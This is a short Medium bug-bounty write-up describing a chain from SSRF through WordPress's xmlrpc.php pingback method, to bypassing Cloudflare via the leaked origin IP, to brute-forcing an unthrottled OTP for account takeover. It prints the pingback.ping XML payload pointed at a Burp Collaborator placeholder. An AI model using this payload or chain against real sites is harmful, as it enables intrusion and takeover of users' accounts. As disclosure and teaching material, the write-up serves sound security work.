Tale of 3 vulnerabilities to account takeover!

https://github.com/projectdiscovery/subfinder
pingback.ping method allowed
<?xml version=”1.0″ encoding=”UTF-8″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>[Burp collaborator link]</string></value>
</param>
<param>
<value><string>[Any valid blog post linl]</string></value>
</param>
</params>
</methodCall>
  1. I found SSRF on the blog page by exploiting xmlrpc.php to get the origin server’s IP,
  2. Used the server’s IP to bypass Cloudflare by directly reaching to the origin server and
  3. Brute forced the OTP to tookover victim’s account (as “rate limiting” wasn’t set at the server side)

Security Engineer @Microsoft | DevSecOps | Speaker | Breaking stuff to learn | Featured in Forbes, BBC| Acknowledged by Google, NASA, Yahoo, UN etc

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

5 Ways To Flop Your Cybersecurity Lead Generation

{UPDATE} Watermelon Smasher Frenzy Hack Free Resources Generator

{UPDATE} おねがい、俺を現実に戻さないで! シンフォニアステージ Hack Free Resources Generator

Matrix World x BloctoBay Land Voucher Raffle

HTTP Request Smuggling: A Primer

How to claim my domain name on Knowhere.art 🎨

{UPDATE} AR My First Calendar Hack Free Resources Generator

{UPDATE} Car Traffic Modern Parking 3D Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Avinash Jain (@logicbomb)

Avinash Jain (@logicbomb)

Security Engineer @Microsoft | DevSecOps | Speaker | Breaking stuff to learn | Featured in Forbes, BBC| Acknowledged by Google, NASA, Yahoo, UN etc

More from Medium

XSS - The LocalStorage Robbery

A short story of IDOR for your perspective

Found API Token on js file

Stumbling into the bug of another